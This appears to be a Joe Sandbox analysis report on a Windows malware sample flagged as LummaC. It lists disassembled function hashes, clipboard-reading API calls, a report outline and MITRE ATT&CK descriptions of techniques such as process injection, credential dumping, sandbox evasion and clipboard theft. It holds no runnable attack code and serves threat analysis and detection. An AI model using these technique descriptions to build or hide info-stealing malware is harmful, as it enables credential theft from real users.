Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 0111A071608341ABD7249F29DD9067FBBE2EBC2364F15AE2CE59653790C630C841CB0A

Function 009BEAA2 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 18e3077ced555875b0dea8ca6900ae82502e681ef3deabf9b105eefdbfeadeae
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: 7211E7747507804FD3148F24CCD2EA27766ABD6328719863DB8419BB93C66CEC05C764

Function 009B0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 102f9b015f559d5b5fdc9428360cf24180a7eae29d0d7f77dfe56e77c5757729
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5101A276A006048FDF21CF64CA05BEB33E9FBC6726F4545A5D90A9B2C1E774A9418F90

Function 009D70E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction ID: 5a997a2a3694c50567687e9f38388cf9db16a521b6f05b1072dc494cf0cc040f
Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction Fuzzy Hash: BCF065B5D0C3808BC718CF28C44066AFBE4AB9A700F10593DD48A93341DB31D545CB4A

Function 009D7797 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction ID: 04c254096b8d2b1a9dd5446cdf2e21730fdd03326e08dc39404900036be73adb
Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction Fuzzy Hash: F3F069B414D3929FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C9028B4A

Function 0042526A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E

Function 009D54D1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction ID: ae0299ae4172fd644557340804e8737b4ad6c8eb55c297b84c083d0aae3abeb2
Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction Fuzzy Hash: 4DF0EDB1688301BAF6258A01CC43F6BB6B4AB95B04F301518B344790E0E5E1F949870E

Function 0043AAB2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609

Function 009EAD19 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: ccdf8ead430ae928cc77911c46d686afb9595a655dbce17ee09be79d34ede70a
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: 55F0A735B456808BE704CF38EC2195ABBE6E38B324F145A7DD641D3751D639D8018605

Function 009D63B6 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction ID: 699d5f43225f1018f20680cf563556aa5a5e8ed1293e78e30d7f7a9f8105322d
Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction Fuzzy Hash: 01D0972488C63AC30E290E1401100BCF7360A03701B0ED5E7DCC13F382CB76EC071A58

Function 009EC268 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19

Function 009D559D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E

Function 009EC79B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C

Function 009E1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009E1347
GetWindowLongW.USER32 ref: 009E136C
GetClipboardData.USER32 ref: 009E137C
GlobalLock.KERNEL32 ref: 009E1395
GlobalUnlock.KERNEL32 ref: 009E14A7
CloseClipboard.USER32 ref: 009E14B0

Strings

], xrefs: 009E13F8
x, xrefs: 009E13E4
W, xrefs: 009E140C
(, xrefs: 009E1425
P, xrefs: 009E1402
j, xrefs: 009E1411

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction ID: 37a3dab5a0db6b008799de10477eac116c438d923361d4f8f24bc4b737e99dd4
Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction Fuzzy Hash: 06415E7150C7818ED301AF7C998836FBEE09B86314F098A7DE4E9863D2D6788548D7A3

Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F845
VariantInit.OLEAUT32 ref: 0042F858

Strings

L, xrefs: 0042F8DA

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53

Function 009DFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009DFAAC
VariantInit.OLEAUT32 ref: 009DFABF

Strings

L, xrefs: 009DFB41

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 10b785a8774e07483f6fb4f0aa7edba53fbfa1d9198719a5f710f8562442f71c
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 15412B7110CBC18ED321DB38845865EBFD1ABE6220F188A9DE5F5873E2D6748549CB53

Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004322EE
GetSystemMetrics.USER32 ref: 004322FD

Strings

, xrefs: 004323A8

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86

Function 0040B9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
FreeLibrary.KERNEL32 ref: 0040B9F7

Strings

v, xrefs: 0040B9D6, 0040B9F7

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: v
API String ID: 3664257935-2904040280
Opcode ID: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
Instruction ID: 58510d58c826e4dda8c4a846b9b6f57f468079e8869e8656342225e30f6071e8
Opcode Fuzzy Hash: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
Instruction Fuzzy Hash: 03C002B98089009BDF416FB5FE0A8293EA5EB4670670201F4FC0951433DB3A0926EB99

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report H1iOI9vWfh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_H1iOI9vWfh.exe_a456159bd056bfea82ee66a91bb0b8f857cb2736_f85504bc_4201d038-09c5-4db6-b946-6412d755a657\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER438E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4881.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER48D0.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
H1iOI9vWfh.exe

Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636
memorycomCOMMON

Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536
COMMON

Function 0040CFF3 Relevance: 7.8, Strings: 6, Instructions: 291
COMMON

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Function 00BCB5D6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141
COMMON

Function 009B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Function 0040EA11 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Function 009B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre